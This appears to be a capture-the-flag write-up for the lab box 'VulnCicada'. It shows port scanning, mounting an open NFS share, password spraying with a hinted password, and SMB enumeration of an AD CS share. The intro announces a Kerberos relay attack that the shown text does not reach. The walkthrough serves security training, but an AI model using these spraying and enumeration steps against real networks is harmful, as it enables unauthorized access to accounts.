VulnCicada
VulnCicada is a medium-difficulty box. Through NFS we obtain images containing a password hint together with the user list from the C:\users directory. Spraying that password against the users yields the credentials of the entry user rosie.powell. Using those credentials to access SMB reveals a large number of certificate files, and enumerating with certipy shows that ESC8 is present. However, because the DC and the AD CS web enrollment service run on the same machine, and the system has self-relay protection, I cannot relay NTLM authentication back to the same host. So I use Kerberos relay to bypass this. I will show how to complete the attack on Linux using SPN serialization and on Windows using RemoteKrbRelay.
1. User & System
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nmap 10.129.200.125 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 07:37 EST
Nmap scan report for 10.129.200.125 (10.129.200.125)
Host is up (0.17s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
52306/tcp open unknown
52372/tcp open unknown
52830/tcp open unknown
61688/tcp open unknown
61689/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 48.38 seconds
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nmap 10.129.200.125 -p53,80,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,9389,49664,49668,52306,52372,52830,61688,61689 -sCV -O -oA nmap/namp
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-15 07:40 EST
Nmap scan report for 10.129.200.125 (10.129.200.125)
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-15 12:40:29Z)
111/tcp open rpcbind?
| rpcinfo:
| program version port/proto service
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2026-01-15T12:26:38
|_Not valid after: 2027-01-15T12:26:38
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-15T12:42:09+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2026-01-14T12:34:14
|_Not valid after: 2026-07-16T12:34:14
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
52306/tcp open msrpc Microsoft Windows RPC
52372/tcp open msrpc Microsoft Windows RPC
52830/tcp open msrpc Microsoft Windows RPC
61688/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
61689/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-15T12:41:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.53 seconds
1.2. NFS
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# showmount -e 10.129.200.125
Export list for 10.129.200.125:
/profiles (everyone)
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# mkdir nfs_share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# mount -t nfs 10.129.200.125:/profiles ./nfs_share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada/nfs_share]
└─# ls
Administrator Debra.Wright Jordan.Francis Katie.Ward Richard.Gibbons Shirley.West
Daniel.Marshall Jane.Carter Joyce.Andrews Megan.Simpson Rosie.Powell
This looks like a C:\users directory.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada/nfs_share]
└─# tree ./
./
├── Administrator
│ ├── Documents
│ │ ├── $RECYCLE.BIN
│ │ │ └── desktop.ini
│ │ └── desktop.ini
│ └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│ ├── Documents
│ │ ├── $RECYCLE.BIN
│ │ │ └── desktop.ini
│ │ └── desktop.ini
│ └── marketing.png
└── Shirley.West
16 directories, 6 files
These two images look suspicious.
They reveal a password: Cicada123
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb 10.129.200.125 -u valid_users.txt -p pass.txt --continue-on-success -k
SMB 10.129.200.125 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Administrator:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Daniel.Marshall:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Debra.Wright:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jane.Carter:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jordan.Francis:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Joyce.Andrews:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Katie.Ward:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Megan.Simpson:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Richard.Gibbons:Cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Shirley.West:Cicada123 KDC_ERR_CLIENT_REVOKED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Administrator:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Daniel.Marshall:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Debra.Wright:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jane.Carter:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Jordan.Francis:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Joyce.Andrews:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Katie.Ward:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Megan.Simpson:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Richard.Gibbons:cicada123 KDC_ERR_PREAUTH_FAILED
SMB 10.129.200.125 445 DC-JPQ225 [-] cicada.vl\Shirley.West:cicada123 KDC_ERR_CLIENT_REVOKED
1.3. SMB
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb 10.129.200.125 -u rosie.powell -p Cicada123 --shares -k
SMB 10.129.200.125 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.200.125 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
SMB 10.129.200.125 445 DC-JPQ225 [*] Enumerated shares
SMB 10.129.200.125 445 DC-JPQ225 Share Permissions Remark
SMB 10.129.200.125 445 DC-JPQ225 ----- ----------- ------
SMB 10.129.200.125 445 DC-JPQ225 ADMIN$ Remote Admin
SMB 10.129.200.125 445 DC-JPQ225 C$ Default share
SMB 10.129.200.125 445 DC-JPQ225 CertEnroll READ Active Directory Certificate Services share
SMB 10.129.200.125 445 DC-JPQ225 IPC$ READ Remote IPC
SMB 10.129.200.125 445 DC-JPQ225 NETLOGON READ Logon server share
SMB 10.129.200.125 445 DC-JPQ225 profiles$ READ,WRITE
SMB 10.129.200.125 445 DC-JPQ225 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-smbclient -k DC-JPQ225.cicada.vl -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use CertEnroll
# ls
drw-rw-rw- 0 Thu Jan 15 07:40:28 2026 .
drw-rw-rw- 0 Fri Sep 13 11:17:59 2024 ..
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(1)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(1).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(10)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(10).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(11)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(11).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(12)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(12).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(13)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(13).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(14)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(14).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(15)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(15).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(16)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(16).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(17)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(17).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(18)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(18).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(19)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(19).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(2)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(2).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(20)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(20).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(21)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(21).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(22)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(22).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(23)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(23).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(24)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(24).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(25)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(25).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(26)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(26).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(27)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(27).crl
-rw-rw-rw- 742 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(28)+.crl
-rw-rw-rw- 943 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(28).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(3)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(3).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(4)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(4).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(5)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(5).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(6)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(6).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA(7)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(7).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(8)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(8).crl
-rw-rw-rw- 741 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(9)+.crl
-rw-rw-rw- 941 Thu Jan 15 07:35:09 2026 cicada-DC-JPQ225-CA(9).crl
-rw-rw-rw- 736 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA+.crl
-rw-rw-rw- 933 Thu Jan 15 07:35:10 2026 cicada-DC-JPQ225-CA.crl
-rw-rw-rw- 1385 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(0-1).crt
-rw-rw-rw- 924 Sun Sep 15 03:51:18 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-0).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:43 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(1-2).crt
-rw-rw-rw- 924 Thu Apr 10 04:44:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-11).crt
-rw-rw-rw- 1391 Thu Apr 10 04:57:00 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(10-9).crt
-rw-rw-rw- 924 Thu Apr 10 04:58:25 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-10).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(11-12).crt
-rw-rw-rw- 924 Thu Apr 10 05:00:22 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-11).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(12-13).crt
-rw-rw-rw- 924 Thu Apr 10 05:03:13 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13).crt
-rw-rw-rw- 1391 Fri Apr 11 01:48:18 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-12).crt
-rw-rw-rw- 1391 Tue Jun 3 06:21:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(13-14).crt
-rw-rw-rw- 924 Fri Apr 11 01:49:41 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-13).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(14-15).crt
-rw-rw-rw- 924 Fri Apr 11 01:51:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:11 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-14).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(15-16).crt
-rw-rw-rw- 924 Fri Apr 11 01:53:40 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16).crt
-rw-rw-rw- 1391 Tue Jun 3 06:22:12 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-15).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(16-17).crt
-rw-rw-rw- 924 Tue Jun 3 06:23:15 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-16).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(17-18).crt
-rw-rw-rw- 924 Tue Jun 3 06:24:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:26 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-17).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(18-19).crt
-rw-rw-rw- 924 Tue Jun 3 06:26:51 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19).crt
-rw-rw-rw- 1391 Wed Jun 4 08:51:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-18).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(19-20).crt
-rw-rw-rw- 924 Sun Sep 15 03:53:03 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2).crt
-rw-rw-rw- 1390 Sun Sep 15 09:18:44 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-1).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(2-3).crt
-rw-rw-rw- 924 Wed Jun 4 08:52:43 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-19).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(20-21).crt
-rw-rw-rw- 924 Wed Jun 4 08:54:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-20).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(21-22).crt
-rw-rw-rw- 924 Wed Jun 4 08:56:47 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22).crt
-rw-rw-rw- 1391 Wed Jun 4 09:34:59 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-21).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(22-23).crt
-rw-rw-rw- 924 Wed Jun 4 09:36:17 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-22).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(23-24).crt
-rw-rw-rw- 924 Wed Jun 4 09:38:20 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-23).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(24-25).crt
-rw-rw-rw- 924 Wed Jun 4 09:40:21 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25).crt
-rw-rw-rw- 1391 Wed Jun 4 10:02:35 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-24).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(25-26).crt
-rw-rw-rw- 924 Wed Jun 4 10:04:01 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-25).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-27).crt
-rw-rw-rw- 924 Wed Jun 4 10:05:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-26).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-28).crt
-rw-rw-rw- 924 Wed Jun 4 10:07:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28).crt
-rw-rw-rw- 1391 Thu Jan 15 07:35:08 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28-27).crt
-rw-rw-rw- 924 Thu Jan 15 07:36:27 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(29).crt
-rw-rw-rw- 924 Sun Sep 15 09:21:57 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-2).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-4).crt
-rw-rw-rw- 924 Thu Jan 15 07:38:27 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(30).crt
-rw-rw-rw- 924 Thu Jan 15 07:40:28 2026 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
-rw-rw-rw- 924 Sun Sep 15 09:24:12 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4).crt
-rw-rw-rw- 1390 Sun Sep 29 05:41:30 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-3).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-5).crt
-rw-rw-rw- 924 Sun Sep 29 05:43:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-4).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-6).crt
-rw-rw-rw- 924 Sun Sep 29 05:44:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-5).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-7).crt
-rw-rw-rw- 924 Sun Sep 29 05:46:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7).crt
-rw-rw-rw- 1390 Thu Apr 10 04:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-6).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-8).crt
-rw-rw-rw- 924 Thu Apr 10 04:40:45 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-7).crt
